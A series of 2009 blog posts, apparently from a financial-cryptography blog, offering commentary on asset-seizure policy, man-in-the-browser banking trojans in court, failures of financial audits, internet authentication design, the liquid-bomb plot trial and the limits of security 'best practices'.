    Which brings us to the FATF, the rot within modern civilisation. This Paris-based body with the soft and safe title of "Financial Action Task Force" deals with something called money laundering. Technically, money laundering exists and there is little dispute about this; criminals need a way to turn their ill-gotten gains into profit. When criminals get big, they need to turn a lot of bad money into good money. So part of the game for the big boys was to set up large businesses that could wash a lot of money. It is called laundering, and washing because the first large-scale money-cleansing businesses were launderies or launderettes: shops with coin-operated washing machines, which took lots and lots of cash, in a more or less invisible fashion. Etc etc, this is all well known, undisputed, a history full of colour.

    What is much more disputable is how to deal with it. And this is where the FATF took us on the rather short path to a long stay in hell. Their prescription was simple: seize the money, and keep it. It is indeed as simple as the law of Consolidated Revenue. Which they then proceeded to break, as well, in their innocence and goodliness.

    The Economist reports on how far Britain, a leader in this race to disaster, has come in 30 short years it has taken to unravel centuries of governance:

    The public sale of criminals' property, usually through auction houses or salvage merchants, has been big business for a long time. The goods are those that crooks have acquired legitimately but with dirty money, as opposed to actual stolen property, which the police must try to reunite with its rightful owners. Half the proceeds go to the Home Office, and the rest to the police, prosecutors and courts. The bigger police forces cream off millions of pounds a year in this way (see chart).

    So if a crook steals goods, the police work for the victim. But if a crook makes money by any other means, the police no longer works for the victim, but for itself. We now have the Home Office, the prosecutors, the courts, and the humble British Bobby well incentivised to promote money laundering in all its guises. Note that the profit margin in this business is *well in excess of standard business rates of return* and we will then have no surprise at all that the business of legal money laundering is booming:

    Powers to confiscate criminals' ill-gotten gains have grown steadily. A drugs case in 1978, in which the courts were unable to strip the traffickers of £750,000 of profits, caused Parliament to pass asset-seizure laws that applied first to drug dealers, and then more widely. The 2002 Proceeds of Crime Act expanded these powers greatly, allowing courts to seize more or less anything owned by a convict deemed to have a "criminal lifestyle", and introducing a power of civil recovery, whereby assets may be confiscated through the civil courts even if their owner has not been convicted of a crime.

    Everyone's happy with that of course! (Read the last two paragraphs for a good, honest middle-class belly laugh.) Of course, the normal argument is that the police are the good guys, and they do the right thing. And if you oppose them, you must be a criminal! Or, you like criminals or benefit from criminals or in some way, you are dirty like a criminal.

    And such it is. This is the sort of thought level that characterizes the discussion, and is frequently brought up by supporters of the money laundering programmes. It's also remarkably similar to the rhetoric leading up to most bad wars (who said "you're either with us or against us?"), pogroms and other crimes against civilisation.

    Serious students of economics and society can do better. Let's follow the money:

    Since then, police cupboards have filled up fast. Confiscations of criminal proceeds in 2001-02 amounted to just £25m; in 2007-08 they were £136m, and the Home Office has set a goal of £250m for the current financial year. To meet this, new powers are planned: a bill before parliament would allow property to be seized from people who have been arrested but not yet charged, though it would still not be sold until conviction. This, police hope, will prevent criminals from disposing of their assets during the trial.

    This is the standard evolution of a new product cycle in profitable business. First, mine the easy gold that is right there in front of you. Next, develop variations to increase revenues. Third, institute good management techniques to reduce wastage. The Home Office is setting planning targets for profit raising, and searching for more revenue. The government has burst its chains of public service and is now muckraking with the rest of the dirty money-grubbing corporates, and is now in a deadly embrace of profitability with the dirty criminal classes.

    All because the legislature forgot the fundamental laws of governance!

    Can the British electorate possibly reel in this insatiable tiger, now they've incentivised it to chase and seize profit? Probably not. But, "surely that doesn't matter," cry the middle-class masses, safe in their suburban homes? Surely the police would never cross the NEXT line and become the criminals, seizing money and assets that was not ill-gotten?

    Don't be so sure. There is enough anecdotal evidence in the USA (1) that this is routine and regular. And unchallenged. It will happen in Britain, and if it goes unchallenged, the next step will become institutionalised: deliberate targetting of quasi-criminal behaviour for revenue raising purposes. Perhaps you've already seen it: are speeding fines collected on wide open motorways, or in danger spots?

    The FATF have broken the laws of civilisation, and now we are at the point where the evidence of the profit-making police-not-yet-gang is before us. The Economist's article is nearly sarcastic .. uncomfortable with this immoral behaviour, but not yet daring to name the wash within Whitehall. Reading between the lines of that article, it is both admiring of the management potential of the Home Office (should we advise them to get an MBA?), and deeply disgusted. As only an economist can be, when it sees the road to hell.

    Britain stands at the cusp. What do we see when we look down?

    We see Mexico, the country that Ronald Reagan hollowed out. That late great President of the USA had one massive black mark on his career, which is a cross for us all to bear, now that he's skipped off to heaven.

    Ronald Reagan created the War on Drugs, which was America's part in the FATF alliance. It was called "War" for marketing reasons: nobody criticises the patriotic warriors, nobody dare challenge their excesses. This was another stupidity, another breach of the natural laws of civilisation (separation of powers, or in USA, this might be better known as the destruction of the Posse Comitatus Act). This process took the "War" down south of the border, and turned the Mexican political parties, judiciary, police force and other powerful institutions into victims of Ronald Reagan's "War". From a police perspective, Mexico was already hollowed out last decade; what we are seeing in the current decade is the hollowing out of the Army. The carving up of battalions and divisions into the various gangs that control the flow of hot-demand items to from the poor south to the rich north of the Americas.


    When considering these issues, and our Future in Mexico, there are several choices.

    The really sensible one would be to shut down the FATF and its entire disastrous experiment. Tar&feather anyone involved with them, run them out of town backwards on a donkey, preferably to a remote spot in the Pacific, with or without speck of land. The FATF are irreparable, convinced that they are the good guys, and can do no wrong. But politically, this is unlikely, because it would damn the politicians of a generation for adopting childish logic while on duty before the public. And the FATF's influence is deep within the regulatory and financial structure, everyone will be reminded that "you backed us then, you don't want people to think you're wrong..." Nobody will admit the failure, nobody will say «¡Discuplanos!» to the Mexican pueblo for depriving them of honest policing and a civilised life.

    The simple choice is to go back to our civilised roots and impose the principle of Consolidated Revenue back into law. In this model, the Home Office should have its business permit taken away from it, and budget control be restored. The Leicestershire Constabulary should be raided by Treasury and have its eBay and Paypal accounts seized, like any other financial misfits. This is the Al Capone solution, which nobody is comfortable with, because it admits we can't deal with the problem properly. But it does seem to be the only practical solution of a very bad lot.

    Or we choose to go to Mexico. Step by step, slowly but in our lifetimes. It took 20 years to hollow out Mexico, we have a bit longer in other countries, because the institutions are staffed by stiffer, better educated people.

    But not that long. That is the thing about the natural laws: breach them, and the policing power of the economy will come down on you eventually. The margins on the business of sharing out ill-gotten gains are way stronger than any principled approach to policing or governance can deal with. I'd give it another 20 years for Britain to get to where Mexico is now.


    Posted by iang at 09:01 AM | Comments (4) | TrackBack

    October 01, 2009

    Man-in-the-Browser goes to court

    Stephen Mason reports that MITB is in court:

    A gang of internet fraudsters used a sophisticated virus to con members of the public into parting with their banking details and stealing £600,000, a court heard today.

    Once the 'malicious software' had infected their computers, it waited until users logged on to their accounts, checked there was enough money in them and then insinuated itself into cash transfer procedures.

    (also on El Reg.) This breaches the 2-factor authentication system commonly in use because it (a) controls the user's PC, and (b) the authentication scheme that was commonly pushed out over the last decade or so only authenticates the user, not the transaction. So as the trojan now controls the PC, it is the user. And the real user happily authenticates itself, and the trojan, and the trojan's transactions, and even lies about it!

    Numbers, more than ordinarily reliable because they have been heard in court:

    'In fact as a result of this Trojan virus fraud very many people - 138 customers - were affected in this way with some £600,000 being fraudulently transferred.

    'Some of that money, £140,000, was recouped by NatWest after they became aware of this scam.'

    This is called Man-in-the-browser, which is a subtle reference to the SSL's vaunted protection against Man-in-the-middle. Unfortunately several things went wrong in this area of security: Adi's 3rd law of security says the attacker always bypasses; one of my unnumbered aphorisms has it that the node is always the threat, never the wire, and finally, the extraordinary success of SSL in the mindspace war blocked any attempts to fix the essential problems. SSL is so secure that nobody dare challenge browser security.

    The MITB was first reported in March 2006 and sent a wave of fear through the leading European banks. If customers lost trust in the online banking, this would turn their support / branch employment numbers on their heads. So they rapidly (for banks) developed a counter-attack by moving their confirmation process over to the SMS channel of users' phones. The Man-in-the-browser cannot leap across that air-gap, and the MITB is more or less defeated.

    European banks tend to be proactive when it comes to security, and hence their losses are miniscule. Reported recently was something like €400k for a smaller country (7 million?) for an entire year for all banks. This one case in the UK is double that, reflecting that British banks and USA banks are reactive to security. Although they knew about it, they ignored it.

    This could be called the "prove-it" school of security, and it has merit. As we saw with SSL, there never really was much of a threat on the wire; and when it came to the node, we were pretty much defenceless (although a lot of that comes down to one factor: Microsoft Windows). So when faced with FUD from the crypto / security industry, it is very very hard to separate real dangers from made up ones. I felt it was serious; others thought I was spreading FUD! Hence Philipp Güring's paper Concepts against Man-in-the-Browser Attacks, and the episode formed fascinating evidence for the market for silver bullets. The concept is now proven right in practice, but it didn't turn out how we predicted.

    What is also interesting is that we now have a good cycle timeline: March 2006 is when the threat first crossed our radars. September 2009 it is in the British courts.

    Postscript. More numbers from today's MITB:

    A next-generation Trojan recently discovered pilfering online bank accounts around the world kicks it up a notch by avoiding any behavior that would trigger a fraud alert and forging the victim's bank statement to cover its tracks.

    The so-called URLZone Trojan doesn't just dupe users into giving up their online banking credentials like most banking Trojans do: Instead, it calls back to its command and control server for specific instructions on exactly how much to steal from the victim's bank account without raising any suspicion, and to which money mule account to send it the money. Then it forges the victim's on-screen bank statements so the person and bank don't see the unauthorized transaction.

    Researchers from Finjan found the sophisticated attack, in which the cybercriminals stole around 200,000 euro per day during a period of 22 days in August from several online European bank customers, many of whom were based in Germany....

    "The Trojan was smart enough to be able to look at the [victim's] bank balance," says Yuval Ben-Itzhak, CTO of Finjan... Finjan found the attackers had lured about 90,000 potential victims to their sites, and successfully infected about 6,400 of them. ...URLZone ensures the transactions are subtle: "The balance must be positive, and they set a minimum and maximum amount" based on the victim's balance, Ben-Itzhak says. That ensures the bank's anti-fraud system doesn't trigger an alert, he says.

    And the malware is making the decisions -- and alterations to the bank statement -- in real time, he says. In one case, the attackers stole 8,576 euro, but the Trojan forged a screen that showed the transferred amount as 53.94 euro. The only way the victim would discover the discrepancy is if he logged into his account from an uninfected machine.

    Posted by iang at 09:26 AM | Comments (1) | TrackBack

    September 14, 2009

    Audits V: Why did this happen to us ;-(

    To summarise previous posts, what do we know? We know so far that the hallowed financial Audit doesn't seem to pick up impending financial disaster, on either a micro-level like Madoff (I) or a macro-level like the financial crisis (II). We also know we don't know anything about it (III), trying harder didn't work (II), and in all probability the problem with Audit is systemic (IV). That is, likely all of them, the system of Audits, not any particular one. The financial crisis tells us that.

    Notwithstanding its great brand, Audit does not deliver. How could this happen? Why did our glowing vision of Audit turn out to be our worst nightmare? Global financial collapse, trillions lost, entire economies wallowing in the mud and slime of bankruptcy shame?

    Let me establish the answer to this by means of several claims.

    First, complexity . Consider what audit firm Ernst & Young told us a while back:

    The economic crisis has exposed inherent weaknesses in the risk management practices of banks, but few have a well-defined vision of how to tackle the problems, according to a study by Ernst & Young.

    Of 48 senior executives from 36 major banks around the world questioned by Ernst & Young, just 14% say they have a consolidated view of risk across their organisation. Organisational silos, decentralisation of resources and decision-making, inadequate forecasting, and lack of transparent reporting were all cited as major barriers to effective enterprise-wide risk management.

    The point highlighted above is this: This situation is complex! In essence, the process is too complex for anyone to appreciate from the outside. I don't think this point is so controversial, but the next are.

    My second claim is that in any situation, stakeholders work to improve their own position . To see this, think about the stakeholders you work with. Examine every decision that they take. In general, every decision that reduces the benefit to them will be fiercely resisted, and any decision that increases the benefit to them will be fiercely supported. Consider what competing audit firm KPMG says:

    A new study put out by KPMG, an audit, tax and advisory firm said that pressure to do "whatever it takes" to achieve business goals continues as the primary driver behind corporate fraud and misconduct.

    Of more than 5,000 U.S. workers polled this summer, 74 percent said they had personally observed misconduct within their organizations during the prior 12 months, unchanged from the level reported by KPMG survey respondents in 2005. Roughly half (46 percent) of respondents reported that what they observed "could cause a significant loss of public trust if discovered," a figure that rises to 60 percent among employees working in the banking and finance industry.

    This is human nature, right? It happens, and it happens more than we like to admit. I suggest it is the core and prime influence, and won't bother to argue it further, although if you are unsatisfied at this claim, I suggest you read Lewis on The End (warning it's long).

    As we are dealing with complexity, even insiders will not find it easy to identify the nominal, original benefit to end-users. And, if the insiders can't identify the benefit, they can't put it above their own benefit. Claims one and two, added together, give us claim three: over time, all the benefit will be transferred from the end-users to the insiders . Inevitably. And, it is done naturally, subconciously and legally.

    What does this mean to Audits? Well, Auditors cannot change this situation. If anything, they might make it worse. Consider these issues:

    • the Auditor is retained by the company,
    • to investigate a company secret,
    • the examination, the notes, the results and concerns are all secret,
    • the process and the learning of audit work is surrounded by mystique and control in classical guild fashion,
    • the Auditor bills-per-hour,
    • the Auditor knows what the problems are,
    • and has integral consulting resources attached,
    • who can be introduced to solve the problems,
    • and bill-per-hour.

    As against all that complexity and all that secrecy, there is a single Auditor, delivering a single report. To you. A rather single very small report, as against a rather frequent and in sum, huge series of bills.

    So in all this complexity, although the Audit might suggest that they can reduce the complexity by means of compressing it all into one single "opinion", the complexity actually works to the ultimate benefit of the Auditor. Not to your benefit. It is to the Auditor's advantage to increase the complexity, and because it is all secret and you don't understand it anyway, any negative benefit to you is not observable. Given our second claim, this is indeed what they do.

    Say hello to SOX, a doubling of the complexity, and a doubling of your auditor's invoice.

    Say thank you, Congressmen Sarbanes and Oxley, and we hope your pension survives!

    Claim Number 4: The Auditor has become the insider. Although he is the one you perceive to be an outsider, protecting your interests, in reality, the Auditor is only a nominal, pretend outsider. He is in reality a stakeholder who was given the keys to become an insider a long time ago. Is there any surprise that, with the passage of time, the profession has moved to secure its role? As stakeholder? As insider? To secure the benefit to itself?

    Over time, the noble profession of Auditing has moved against your interests. Once, it was a mighty independent observer, a white knight riding forth to save your honour, your interest, your very patrimony. Audits were penetrating and meticulous!

    Now, the auditor is just another incumbent stakeholder, another mercenary for hire. Test this: did any audit firm fight the rise of Sarbanes-Oxley as being unnecessary, overly costly and not delivering value for money to clients? Does any audit firm promote a product that halves the price? Halves the complexity? Has any audit firm investigated the relationship between the failed banks and the failed audits over those banks? Did any audit firm suggest that reserves weren't up to a downturn? Has any audit firm complained that mark-to-market depends on a market? Did any auditor insist on stress testing? Has ... oh never mind.

    I'm honestly interested in this question. If you know the answer: posted it in comments! With luck, we can change the flow of this entire research, which awaits ... the NEXT post.

    Posted by iang at 03:42 PM | Comments (3) | TrackBack

    September 11, 2009

    40 years on, packets still echo on, and we're still dropping the auth-shuns

    It's terrifically cliched to say it these days, but the net is one of the great engineering marvels of science. The Economist reports it as 40 years old:

    Such contentious issues never dawned on the dozen or so engineers who gathered in the laboratory of Leonard Kleinrock (pictured below) at the University of California, Los Angeles (UCLA) on September 2nd, 1969, to watch two computers transmit data from one to the other through a 15-foot cable. The success heralded the start of ARPANET, a telecommunications network designed to link researchers around America who were working on projects for the Pentagon. ARPANET, conceived and paid for by the defence department’s Advanced Research Projects Agency (nowadays called DARPA), was unquestionably the most important of the pioneering “packet-switched” networks that were to give birth eventually to the internet.

    Right, ARPA funded a network, and out of that emerged the net we know today. Bottom-up, not top-down like the European competitor, OSI/ISO. Still, it wasn't about doing everything from the bottom:

    The missing link was supplied by Robert Kahn of DARPA and Vinton Cerf at Stanford University in Palo Alto, California. Their solution for getting networks that used different ways of transmitting data to work together was simply to remove the software built into the network for checking whether packets had actually been transmitted—and give that responsibility to software running on the sending and receiving computers instead. With this approach to “internetworking” (hence the term “internet), networks of one sort or another all became simply pieces of wire for carrying data. To packets of data squirted into them, the various networks all looked and behaved the same.

    I hadn't realised that this lesson is so old, but that makes sense. It is a lesson that will echo through time, doomed to be re-learnt over and over again, because it is so uncomfortable: The application is responsible for getting the message across, not the infrastructure. To the extent that you make any lower layer responsible for your packets, you reduce reliability.

    This subtlety -- knowing what you could push down into the lower layers, and what you cannot -- is probably one of those things that separates the real engineers from the journeymen. The wolves from the sheep, the financial cryptographers from the Personal-Home-Pagers. If you thought TCP was reliable, you may count yourself amongst latter, the sheepish millions who believed in that myth, and partly got us to the security mess we are in today. (Related, it seems is that cloud computing has the same issue.)

    Curiously, though, from the rosy eyed view of today, it is still possible to make the same layer mistake. Gunnar reported on the very same Vint Cerf saying today (more or less):

    Internet Design Opportunities for Improvement

    There's a big Gov 2.0 summit going on, which I am not at but in the event apparently John Markoff asked Vint Cerf ths following question: "what would you have designed differently in building the Internet?" Cerf had one answer: "more authentication"

    I don't think so. Authentication, or authorisation or any of those other shuns is again something that belongs in the application. We find it sits best at the very highest layer, because it is a claim of significant responsibility. At the intermediate layers you'll find lots of wannabe packages vying for your corporate bux:

    * IP * IP Password * Kerberos * Mobile One Factor Unregistered * Mobile Two Factor Registered * Mobile One Factor Contract * Mobile Two Factor Contract * Password * Password Protected transport * Previous Session * Public Key X.509 * Public Key PGP * Public Key SPKI * Public Key XML Digital Signature * Smartcard * Smartcard PKI * Software PKI * Telephony * Telephony Nomadic * Telephony Personalized * Telephony Authenticated * Secure remote password * SSL/TLS Client Authentication * Time Sync Token * Unspecified

    and that's just in SAML! "Holy protocol hodge-podge Batman! " says Gunnar, and he's not often wrong.

    Indeed, as Adam pointed out, the net works in part because it deliberately shunned the auth:

    The packet interconnect paper ("A Protocol for Packet Network Intercommunication," Vint Cerf and Robert Kahn) was published in 1974, and says "These associations need not involve the transmission of data prior to their formation and indeed two associates need not be able to determine that they are associates until they attempt to communicate."

    So what was Vint Cerf getting at? He clarified in comments to Adam:

    The point is that the current design does not have a standard way to authenticate the origin of email, the host you are talking to, the correctness of DNS responses, etc. Does this autonomous system have the authority to announce these addresses for routing purposes? Having standard tools and mechanisms for validating identity or authenticity in various contexts would have been helpful.

    Right. The reason we don't have standard ways to do this is because it is too hard a problem. There is no answer to what it means:

    people like me could and did give internet accounts to (1) anyone our boss said to and (2) anyone else who wanted them some of this internet stuff and wouldn't get us in too much trouble. (Hi S! Hi C!)

    which therefore means, it is precisely and only whatever the application wants. Or, if your stack design goes up fully past layer 7 into the people layer, like CAcert.org, then it is what your boss wants. So, Skype has it, my digital cash has it, Lynn's X959 has it, and PGP has it. IPSec hasn't got it, SSL hasn't got it, and it looks like SAML won't be having it, in truck-loads :) Shame about that!

    Digital signature technology can help here but just wasn't available at the time the TCP/IP protocol suite was being standardized in 1978.

    (As Gunnar said: "Vint Cerf should let himself off the hook that he didn't solve this in 1978.") Yes, and digital signature technology is another reason why modern clients can be designed with it, built in and aligned to the application. But not "in the Internet" please! As soon as the auth stuff is standardised or turned into a building block, it has a terrible habit of turning into treacle. Messy brown sticky stuff that gets into everything, slows everyone down and gives young people an awful insecurity complex derived from pimples.

    Oops, late addition of counter-evidence: "US Government to let citizens log in with OpenID and InfoCard?" You be the judge!

    Posted by iang at 12:57 PM | Comments (2) | TrackBack

    September 10, 2009

    Hide & seek in the terrorist battle

    Court cases often give us glimpses of security issues. A court in Britain has just convicted three from the liquid explosives gang, and now that it is over, there are press reports of the evidence. It looks now like the intelligence services achieved one of two possible victories by stopping the plot. Wired reports that NSA intercepts of emails have been entered in as evidence.

    According to Channel 4, the NSA had previously shown the e-mails to their British counterparts, but refused to let prosecutors use the evidence in the first trial, because the agency didn’t want to tip off an alleged accomplice in Pakistan named Rashid Rauf that his e-mail was being monitored. U.S. intelligence agents said Rauf was al Qaeda’s director of European operations at the time and that the bomb plot was being directed by Rauf and others in Pakistan.

    The NSA later changed its mind and allowed the evidence to be introduced in the second trial, which was crucial to getting the jury conviction. Channel 4 suggests the NSA’s change of mind occurred after Rauf, a Briton born of Pakistani parents, was reportedly killed last year by a U.S. drone missile that struck a house where he was staying in northern Pakistan.

    Although British prosecutors were eager to use the e-mails in their second trial against the three plotters, British courts prohibit the use of evidence obtained through interception. So last January, a U.S. court issued warrants directly to Yahoo to hand over the same correspondence.

    So there are some barriers between intercept and use in trial. The reason they came from the NSA is probably that old trick of avoiding prohibitions on domestic surveillance: if the trial had been in the USA, GCHQ might have provided the intercepts.

    What however was more interesting is the content of the alleged messages. This BBC article includes 7 of them, here's one:

    4 July 2006: Abdulla Ahmed Ali to Pakistan Accused plotter Abdulla Ahmed Ali

    Listen dude, when is your mate gonna bring the projectors and the taxis to me? I got all my bits and bobs. Tell your mate to make sure the projectors and taxis are fully ready and proper I don't want my presentation messing up.

    WHAT PROSECUTORS SAID IT MEANT Prosecutors said that projectors and taxis were code for knowledge and equipment because Ahmed Ali still needed some guidance. The word "presentation" could mean attack.

    The others also have interesting use of code words, such as Calvin Klein aftershave for hydrogen peroxide (hair bleach). The use of such codes (as opposed to ciphers) is not new; historically they were well known. Code words tend not to be used now because ciphers cover more of the problem space, and once you know something of the activity, the listener can guess at the meanings.

    In theory at least, and code words clearly didn't work to protect the liquid bombers. Worse for them, it probably made their conviction easier, because Muslims discussing the purchase of 4 litres of aftershave with other Mulsims in Pakistan seems very odd.

    One remaining question was whether the plot would actually work. We all know that the airlines banned liquids because of this event. Many amateurs have opined that it is simply too hard to do liquid explosives. However, the BBC employed an expert to try it, and using what amounts to between half a litre to a liter of finished product, they got this result:

    Certainly a dramatic explosion, enough to kill people within a few metres, and enough to blow a 2m hole in the fuselage. (The BBC video is only a minute long, well worth watching.)

    Would this have brought down the aircraft? Not necessarily as there are many examples of airlines with such damage that have survived. Perhaps if the bomb was in a strategic spot (over wing? or near the fuel lines?) or the aircraft was stuck over the Atlantic with no easy vector. Either way, a bad day to fly, and as the explosives guy said, pity the passengers that didn't have their seat belt on.

    Score one for the intel agencies. But the terrorists still achieved their second victory out of two: passengers are still terrorised in their millions when they forget to dispose of their innocent drinking water. What is somewhat of a surprise is that the terrorists have not as yet seized on the disruptive path that is clearly available, a la John Robb. I read somewhere that it only takes a 7% "security tax" on a city to destroy it over time, and we already know that the airport security tax has to be in that ballpark.

    "It's the End of the CISO As We Know It (And I Feel Fine)"...

    ...First, they miss the opportunity to look at security as a business enabler. Dr. Garigue pointed out that because cars have brakes, we can drive faster. Security as a business enabler should absolutely be the starting point for enterprise information security programs.
    ...

    Secondly, if your security model reflects some CYA abstraction of reality instead of reality itself your security model is flawed. I explored this endemic myopia...

    This rhymes with: "what's your business model?" The bit lacking from most orientations is the enabler, why are we here in the first place? It's not to show the most elegant protocol for achieving C-I-A (confidentiality, integrity, authenticity), but to promote the business.

    How do we do that? Well, most technologists don't understand the business, let alone can speak the language. And, the business folks can't speak the techno-crypto blah blah either, so the blame is fairly shared. Dr. Garigue points us to Charlemagne as a better model:

    King of the Franks and Holy Roman Emperor; conqueror of the Lombards and Saxons (742-814) - reunited much of Europe after the Dark Ages.

    He set up other schools, opening them to peasant boys as well as nobles. Charlemagne never stopped studying. He brought an English monk, Alcuin, and other scholars to his court - encouraging the development of a standard script.

    He set up money standards to encourage commerce, tried to build a Rhine-Danube canal, and urged better farming methods. He especially worked to spread education and Christianity in every class of people.

    He relied on Counts, Margraves and Missi Domini to help him.

    Margraves - Guard the frontier districts of the empire. Margraves retained, within their own jurisdictions, the authority of dukes in the feudal arm of the empire.

    Missi Domini - Messengers of the King.

    In other words, the role of the security person is to enable others to learn, not to do, nor to critique, nor to design. In more specific terms, the goal is to bring the team to a better standard, and a better mix of security and business. Garigue's mandate for IT security?

    Knowledge of risky things is of strategic value

    How to know today tomorrow’s unknown ?

    How to structure information security processes in an organization so as to identify and address the NEXT categories of risks ?

    Curious, isn't it! But if we think about how reactive most security thinking is these days, one has to wonder where we would ever get the chance to fight tomorrow's war, today?

    July 12, 2009

    Audits IV - How many rotten apples will spoil the barrel?

    In the previous post on Audits (1, 2, 3) I established that you yourself cannot determine from the outside whether an audit is any good. So how do we deal with this problem?

    We can take a statistical approach to the investigation. We can probably agree that some audits are not strong (the financial crisis thesis), and some are definitely part of the problem (Enron, Madoff, Satyam, Stanford) not the solution. This rules out all audits being good.

    The easy question: are all audits in the bad category, and we just don't know it, or are some good and some bad? We can rule out all audits being bad, because Refco was caught by a good audit, eventually.

    So we are somewhere in-between the extremes. Some good, some bad. The question then further develops into whether the ones that are good are sufficiently valuable to overcome the ones that are bad. That is, one totally fraudulent result can be absorbed in a million good results. Or, if something is audited, even badly or with a percentage chance of bad results, some things should be improved, right?

    Statistically, we should still get a greater benefit.

    The problem with this view is that we the outside world can't tell which is which, yet the point of the audit is to tell us: which is which. Because of the intent of the audit -- entering into the secrets of the corporate and delivering a judgment over the secrets -- there are no tools for us to distinguish. This is almost deliberate, almost by definition! The point of the audit is for us to distinguish the secretively good from the secretively bad; if we also have to distinguish amongst the audits, we have a problem.

    Which is to say, auditing is highly susceptible to the rotten apples problem: a few rotten apples in a barrel quickly makes the whole barrel worthless.

    How many is a few? One failed audit is not enough. But 10 might be, or 100, or 1% or 10%, it all depends. So we need to know some sort of threshold, past which, the barrel is worthless. Once we determine that some percentage of audits above the threshold are bad, all of them are dead, because confidence in the system fails and all audits become ignored by those that might have business in relying on them.

    The empirical question of what that percentage would be is obviously a subject of some serious research, but I believe we can skip it by this simple check. Compare the threshold to our by now painfully famous financial crisis test. So far, in the financial crisis, all the audits failed to pick up the problem (and please, by all means post in comments any exceptions! Anonymously is fine!).

    Whatever the watermark for general failure is, if the financial crisis is any guide, we've probably reached it. We are, I would claim, in the presence of material evidence that the Audit has passed the threshold for public reliance. The barrel is rotten.

    But, how did we reach this terrible state of affairs? How could this happen? Let's leave that speculation for another post.

    (Afterword: Since the last post on Audit, I resigned my role as Auditor over at CAcert. This moves me from slightly inside the profession to mostly outside. Does this change these views written here? So far, no, but you can be the judge.)

    Posted by iang at 05:21 PM | Comments (3) | TrackBack

    April 03, 2009

    The Exquisite Torture of Best Practices

    Best practices has always seemed to be a flaky idea, and it took me a long time to unravel why, at least in my view. It is that, if you adopt best practices, you are accepting, and proving, that you yourself are not competent in this area. In effect, you have no better strategy than to adopt whatever other people say.

    The "competences" theory would have it that you adopt best practices in security if you are an online gardening shop, because your competences lie in the field of delivering gardening tools, plants and green thumbs advice. Not in security, and gosh, if someone steals a thousand plants then perhaps we should also throw in the shovel and some carbon credits to ease them into a productive life...

    On the other hand, if you are dealing with, say, money, best practices in security is not good enough. You have entered a security field, not through fault of your own but because crooks really do always want to steal it. So your ability in defending against that must be elevated, above and beyond the level of "best practices," above and beyond the ordinary.

    In the language of core competences, you must develop a competence in security. Now, Adam comes along and offers an alternate perspective:

    Best practices are ideas which make intuitive sense: don't write down your passwords. Make backups. Educate your users. Shoot the guy in the kneecap and he'll tell you what you need to know.

    I guess it is true that best practices do make some form of intuitive sense, as otherwise they are too hard to propogate. More importantly:

    The trouble is that none of these are subjected to testing. No one bothers to design experiments to see if users who write down their passwords get broken into more than those who don't. No one tests to see if user education works. (I did, once, and stopped advocating user education. Unfortunately, the tests were done under NDA.)

    The other trouble is that once people get the idea that some idea is a best practice, they stop thinking about it critically. It might be because of the authority instinct that Milgram showed, or because they've invested effort and prestige in their solution, or because they believe the idea should work.

    What Adam suggests is that best practices survive far longer than is useful, because they have no feedback loop. Best practices are not tested, so they are a belief, not a practice. Once a belief takes hold, we are into a downward spiral (as described in the Silver Bullets paper, which itself simply applies the full _asymmetric literature_ to security) which at its core is due to the lack of a confirming test in the system that nudges the belief to keep pace with the times; if there is nothing that nudges the idea towards relevancy, it meanders by itself away from relevancy and eventually to wrongness.

    But it is still a belief, so we still do it and smile wisely when others repeat it. For example, best practices has it that you don't write your passwords down. But, in the security field, we all agree now that this is wrong. "Best" is now bad, you are strongly encouraged to write your passwords down. Why do we call the bad idea, "best practices" ? Because there is nothing in the system of best practices that changes it to cope with the way we work today.

    The next time someone suggests something because it's a best practice, ask yourself: is this going to work? Will it be worth the cost?

    I would say -- using my reading of asymmetric goods and with a nod to the systems theory of feedback loops, as espoused by Boyd -- that the next time someone suggests that you use it because it is a best practice, you should ask yourself:

    Do I need to be competent in this field?

    If you sell seeds and shovels, don't be competent in online security. Outsource that, and instead think about soil acidity, worms, viruses and other natural phenomena. If you are in online banking, be competent in security. Don't outsource that, and don't lower yourself to the level of best practices.

    Understand the practices, and test them. Modify them and be ready to junk them. Don't rest on belief, and dismiss others attempts to have you conform to belief they themselves hold, but cannot explain.

    (Then, because you are competent in the field, your very next question is easy. What exactly was the genesis of the "don't write passwords down" belief? Back in the dim dark mainframe days, we had one account and the threat was someone reading the post-it note on the side of the monitor. Now, we each have hundreds of accounts and passwords, and the desire to avoid dictionary attacks forces each password to be unmemorable. For those with the competence, again to use the language of core competences, the rest follows. "Write your passwords down, dear user.")

    Posted by iang at 05:19 AM | Comments (2) | TrackBack

    April 02, 2009

    Are the "brightest minds in finance" finally onto something?

    [Lynn writes somewhere else, copied without shame:]

    A repeated theme in the Madoff hearing (by the person trying for a decade to get SEC to do something about Madoff) was that while new legislation and regulation was required, it was much more important to have transparency and visibility; crooks are inventive and will always be ahead of regulation.

    however ... from The Quiet Coup:

    But there's a deeper and more disturbing similarity: elite business interests -- financiers, in the case of the U.S. -- played a central role in creating the crisis, making ever-larger gambles, with the implicit backing of the government, until the inevitable collapse. More alarming, they are now using their influence to prevent precisely the sorts of reforms that are needed, and fast, to pull the economy out of its nosedive. The government seems helpless, or unwilling, to act against them.

    From The DNA of Corruption:

    While the scale of venality of Wall Street dwarfs that of the Pentagon's, I submit that many of the central qualities shaping America's Defense Meltdown (an important new book with this title, also written by insiders, can be found here) can be found in Simon Johnson's exegesis of America's even more profound Financial Meltdown.

    ... and related to above, Mark-to-Market Lobby Buoys Bank Profits 20% as FASB May Say Yes:

    Officials at Norwalk, Connecticut-based FASB were under "tremendous pressure" and "more or less eviscerated mark-to-market accounting," said Robert Willens, a former managing director at Lehman Brothers Holdings Inc. who runs his own tax and accounting advisory firm in New York. "I'd say there was a pretty close cause and effect."

    From Now-needy FDIC collected little in premiums:

    The federal agency that insures bank deposits, which is asking for emergency powers to borrow up to $500 billion to take over failed banks, is facing a potential major shortfall in part because it collected no insurance premiums from most banks from 1996 to 2006.

    with respect to taxes, there was roundtable of "leading expert" economists last summer about current economic mess. their solution was "flat rate" tax. the justification was:

    1. eliminates possibly majority of current graft & corruption in washington that is related to current tax code structure, lobbying and special interests
    2. picks up 3-5% productivity in GNP. current 65,000 page taxcode is reduced to 600 pages ... that frees up huge amount of people-hrs in lost productivity involved in dealing directly with the taxcode as well as lost productivity because of non-optimal business decisions.

    their bottom line was that it probably would only be temporary before the special interests reestablish the current pervasive atmosphere of graft & corruption.

    a semi-humorous comment was that a special interest that has lobbied against such a change has been Ireland ... supposedly because some number of US operations have been motivated to move to Ireland because of their much simpler business environment.

